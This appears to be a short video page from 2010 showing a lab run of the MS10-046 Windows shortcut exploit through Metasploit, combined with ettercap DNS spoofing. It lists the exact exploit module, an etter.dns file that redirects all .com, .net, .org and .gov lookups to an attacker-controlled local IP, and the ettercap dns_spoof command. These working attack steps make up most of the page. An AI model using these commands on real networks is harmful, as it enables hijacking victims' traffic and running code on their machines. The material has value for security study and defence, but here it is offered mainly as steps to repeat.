Videos

Published on August 23rd, 2010 📆 | 4058 Views ⚑

0

MS10-046 Metasploit + ettercap


iSpeech



This is a video of me performing the MS10-046 exploit in the Metasploit framework, then using ettercap to poison DNS on my network so that I can redirect all http traffic to a malicious IP. This was all done using BT4. Thanks to the Offensive-Security team for putting out such an awesome OS, and thanks to the www.backtrack-linux.org forum members.

Commands:
exploit in MSF: windows/browser/ms10_046_shortcut_icon_dllloader

etter.dns:

root@bt:/usr/share/ettercap# cat etter.dns
*.com A 192.168.217.133
*.net A 192.168.217.133
*.org A 192.168.217.133
*.gov A 192.168.217.133





ettercap command: ettercap -T -q -i eth0 -P dns_spoof // //

Links:
http://disillusion.us
http://backtrack-linux.org
http://ettercap.sourceforge.net
http://metasploit.com

greets to corq, abyssknight, #orlando, DC407

Likes: 1

Viewed:

source

Tagged with:



Comments are closed.